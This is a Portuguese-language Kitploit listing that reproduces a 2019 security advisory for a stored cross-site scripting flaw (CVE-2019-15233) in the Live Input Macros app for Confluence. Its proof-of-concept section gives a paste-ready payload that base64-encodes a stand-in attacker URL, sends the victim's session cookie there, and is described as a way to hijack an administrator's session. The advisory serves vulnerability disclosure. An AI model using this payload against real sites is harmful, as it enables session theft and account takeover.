Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-15233 — (FAB-2019-00157) Vulnerabilidade descoberta por mim CVE-2019-15233 | Kitploit
Ferramentas/GitHubGitHub/l0nax/cve-2019-15233
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubl0nax/cve-2019-15233

CVE-2019-15233

(FAB-2019-00157) Vulnerabilidade descoberta por mim CVE-2019-15233

Ver Repositório
1há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-15233

(FAB-2019-00157) Vulnerabilidade descoberta por mim CVE-2019-15233

Aviso: advisory

Informações Básicas

root@kitploit:~
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH

Créditos

Esta vulnerabilidade de segurança foi encontrada por Francesco Emanuel Bennici [email protected] da FABMation GmbH.

Descrição

O Live Input Macros oferece aos usuários a possibilidade de adicionar caixas de seleção, botões de opção, listas suspensas e muito mais às suas páginas do Confluence e fazer alterações sem editar a página.

Um atacante pode executar código JavaScript no site do Confluence se um usuário adicionar o código malicioso.

Isso pode ser usado para roubar o cookie de sessão de um (ex.) Administrador (Sequestro de Sessão).

PoC/ Exploit

Copie este conteúdo:

root@kitploit:~
Hello World this is my Text Box </p> </div>





alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd

E crie um novo Elemento em uma Página do Confluence. Cole este texto nele e compartilhe a Página do Confluence com (ex.) um Administrador de Sistema e se ele acessar o Site, você pode sequestrar/ "Copiar" a sessão dele.

Baixar ferramenta